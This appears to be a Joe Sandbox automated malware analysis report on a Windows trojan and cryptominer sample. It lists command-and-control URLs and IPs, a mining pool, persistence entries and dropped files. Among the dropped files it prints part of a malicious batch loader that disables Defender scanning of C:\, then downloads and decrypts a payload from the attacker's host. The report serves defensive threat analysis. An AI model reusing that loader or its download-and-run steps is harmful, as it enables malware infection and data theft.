                                        		high
                                        https://woo097878781.win/8pexplorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://woo097878781.win/66/api/endpoint.phpJWOexplorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://aka.ms/pscore6powershell.exe, 0000000C.00000002.1932629434.0000029E65DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://woo097878781.win/66/api/endpoint.phpexplorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://woo097878781.winexplorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exepowershell.exe, 0000000C.00000002.1939596081.0000029E75EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F59000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000371000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642019432.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DA000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://r11.i.lencr.org/0explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://woo097878781.win/explorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://woo097878781.win/upload.phpexplorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://woo097878781.win/32.EXEdownloaded_file.exetrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://x1.c.lencr.org/0explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://x1.i.lencr.org/0explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://woo097878781.win/66/api/endpoint.php6explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://woo097878781.win:443/upload.phpZexplorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://woo097878781.win/rexplorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://woo097878781.win:443/upload.phpexplorer.exe, 00000012.00000003.2618390437.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2689278327.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618618812.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://woo097878781.winpowershell.exe, 00000007.00000002.1807712895.0000023856262000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://oneget.orgXpowershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore68powershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://woo097878781.win/66/api/endpoint.phpProviderexplorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://oneget.orgpowershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://woo097878781.win/66/api/endpoint.phpyeerysyjbfoqmofcexplorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://woo097878781.win/Cexplorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              37.203.243.102
                                                              		pool.hashvault.proRussian Federation
                                                              		44964DAPLDATAPLANETLtdRUfalse
                                                              5.188.137.200
                                                              		unknownRussian Federation
                                                              		50340SELECTEL-MSKRUtrue
                                                              185.157.162.216
                                                              		unknownSweden
                                                              		197595OBE-EUROPEObenetworkEuropeSEtrue
                                                              154.216.20.243
                                                              		woo097878781.winSeychelles
                                                              		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1571252
                                                              Start date and time:2024-12-09 07:36:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 27s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:41
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.expl.evad.mine.winEXE@59/22@2/4
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 131
                                                              • Number of non-executed functions: 247
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 7216 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              01:36:58API Interceptor73x Sleep call for process: powershell.exe modified
                                                              01:37:34API Interceptor2x Sleep call for process: WindosCPUsystem.exe modified
                                                              01:37:34API Interceptor95x Sleep call for process: explorer.exe modified
                                                              06:37:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat
                                                              06:37:28Task SchedulerRun new task: WindowsSystem path: "C:\ProgramData\WindowsSystem\WindowsSystem.exe" s>{34E50511-FBB8-42F8-98A2-2629192A03A0}

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37.203.243.102file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                lokigod.exeGet hashmaliciousXmrigBrowse
                                                                  xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                    5.188.137.200file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                      nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                        185.157.162.216file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                            154.216.20.243file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                              file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                  https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                    https://estacionar-replonline.net/galicia/?fbclid=PAZXh0bgNhZW0BMAABpjGet hashmaliciousUnknownBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      pool.hashvault.profile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 37.203.243.102
                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 5.188.137.200
                                                                                      lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                      • 5.188.137.200
                                                                                      0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                                                                                      • 45.76.89.70
                                                                                      prog.exeGet hashmaliciousXmrigBrowse
                                                                                      • 95.179.241.203
                                                                                      bypass.exeGet hashmaliciousXmrigBrowse
                                                                                      • 95.179.241.203
                                                                                      loader.exeGet hashmaliciousXmrigBrowse
                                                                                      • 142.202.242.43
                                                                                      7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                                                                      • 45.76.89.70
                                                                                      eshkere.batGet hashmaliciousXmrigBrowse
                                                                                      • 95.179.241.203
                                                                                      woo097878781.winfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 154.216.20.243
                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 154.216.20.243

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      SELECTEL-MSKRUfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 5.188.137.200
                                                                                      nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                                      • 5.188.137.200
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      https://telegra.ph/yyrgrfwdfeg-10-25?4077Get hashmaliciousUnknownBrowse
                                                                                      • 5.188.114.126
                                                                                      https://petsworld.nl/trigger.php?r_link=https%3A%2F%2Ftelegra.ph%2Fyyrgrfwdfeg-10-25%3F4077Get hashmaliciousUnknownBrowse
                                                                                      • 5.188.114.126
                                                                                      nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 82.148.14.47
                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                      • 37.9.7.204
                                                                                      DAPLDATAPLANETLtdRUfile.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      v859oajfVH.elfGet hashmaliciousUnknownBrowse
                                                                                      • 37.203.242.178
                                                                                      oAUrOBvfbV.elfGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.246
                                                                                      x86_64-20220704-2102Get hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.210
                                                                                      9faoC0drSoGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.249
                                                                                      armGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.224
                                                                                      eqqFDsQ1JqGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.241
                                                                                      QeykTlqE4SGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.232
                                                                                      OBE-EUROPEObenetworkEuropeSEfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 185.157.162.216
                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 185.157.162.216
                                                                                      secondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                      • 185.157.162.126
                                                                                      Slf.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                      • 185.157.162.126
                                                                                      LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                      • 185.157.162.126
                                                                                      la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 193.183.116.8
                                                                                      LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                                                      • 185.157.162.126
                                                                                      Slf.msiGet hashmaliciousRemcosBrowse
                                                                                      • 185.157.162.126
                                                                                      HSG-IVN-2093456FIN.exeGet hashmaliciousRemcosBrowse
                                                                                      • 185.157.163.135
                                                                                      Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                      • 45.148.17.56

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0ecllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                      • 154.216.20.243
                                                                                      Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                      • 154.216.20.243
                                                                                      Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 154.216.20.243
                                                                                      BUNKER INVOICE MV SUN OCEAN.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 154.216.20.243
                                                                                      Bunker_STS_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 154.216.20.243
                                                                                      a0e9f5d64349fb13191bc781f81f42e1DXzJ8Bi7WC.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 154.216.20.243
                                                                                      cd94pB4Z9p.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 154.216.20.243
                                                                                      AmNdY4tRXD.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.20.243
                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                      • 154.216.20.243
                                                                                      Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                      • 154.216.20.243
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 154.216.20.243

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sysIYXE4Uz61k.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                        file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                          file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                            nlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                                                              LfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                                                                iKvzvknzW1.exeGet hashmaliciousXmrigBrowse
                                                                                                  2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                                                                    DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                                      f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                                                        luQ2wBh8q6.exeGet hashmaliciousXmrigBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2887168
                                                                                                          Entropy (8bit):7.964338317507939
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:FTp9YzrfPjjButTQBFMYgTHCUtlYqjNNYo8HKgJY4Hu+RjytSEuEuIPrzoVji90R:9YzrfPxUQ1YCYbjNN8KgJnuLtrzohWvc
                                                                                                          MD5:56EC5472231866630749CCF6977C4FBD
                                                                                                          SHA1:03C5FE2E0DD49A554B354E7EF26F794F4AA86E9D
                                                                                                          SHA-256:E19905020C9685A68C3F4C9F62F57E4B21BC8DCFAD567C89B0B37B42A120182B
                                                                                                          SHA-512:46274DFEC96406C4BD101C6207C813E03B965E9F9A6B1B57147BCFB7D24A9180002C3B8001AC85A91DFD0B75F0AABBA119E455D52FA847A751C32F00E3AD4753
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg...............&.`....,................@..............................,....._.,...`... ..............................................@,.h.............+..............p,.............................@.+.(....................C,..............................text...._.......`..................`..`.data........p.......d..............@....rdata...R(......T(..f..............@..@.pdata........+.......+.............@..@.xdata..P'....,..(....+.............@..@.bss.... ....0,..........................idata..h....@,.......+.............@....CRT....p....P,.......,.............@....tls.........`,.......,.............@....reloc.......p,.......,.............@..B................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Preview:@...e...........................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2006
                                                                                                          Entropy (8bit):5.290230213116548
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Zld+LwqTf/OR9Q1P31Thl5RqAmC/9T5v6MQVQrBt:ZD8Tf/BPFVt5v6sBt
                                                                                                          MD5:77CE738D9B82E6EBFCFA3F1081F037FC
                                                                                                          SHA1:C4DB7196464F86B05AC3532D99175D2EB09CA7DD
                                                                                                          SHA-256:24FEFBB2301EBD0814FBEE1EDB6B28DAFC871DA247DEFA69BFA3FB999AC8D7C1
                                                                                                          SHA-512:52AFE5FAA53DEB5D555A7A9FC0F5B8F57503F837BCC8B54E2B7D6819952644B8A6A077C77EF3FBF2AF84AE78B086AB547AF393F9290C1EC69929687D8837D70E
                                                                                                          Malicious:true
                                                                                                          Preview:@shift /0..@echo off....net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell -Command "Start-Process -Verb RunAs -FilePath '%~dpnx0' -ArgumentList '/nobreak'".. exit /b..)......PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"....setlocal......set "encoded_url=aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4=" ..set "output=%temp%\downloaded_file.bin" ....powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('%encoded_url%'))) -OutFile '%output%'"......set "key=blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9" ..set "iv=5t9nsUPo0cA/tUjH" ......set "retries=5"..set "delay=10"....for /L %%i in (1,1,%retries%) do (.. timeout /t %delay% /nobreak >nul.. if exist "%output%" (.. .. powershell -WindowStyle Hidden -Command ^.. "$key = [System.Text.Encoding]::UTF8.GetBytes('%key%');" ^.. "$iv = [System.Text.Encoding]::UTF8.GetBytes('%iv%

                                                                                                          C:\Users\user\AppData\Local\Temp\DATABASE

                                                                                                          Download File
                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):49152
                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fo2q1k4.ctr.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avgby4a0.qts.ps1

